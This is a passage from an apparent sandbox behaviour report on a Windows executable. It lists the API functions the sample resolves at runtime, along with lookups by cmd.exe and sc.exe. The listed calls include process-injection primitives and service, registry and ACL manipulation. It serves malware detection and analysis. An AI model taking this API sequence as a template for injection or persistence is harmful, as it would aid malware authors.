\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005412)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00005412)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00005412)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00005412)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005412)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005352)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005352)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 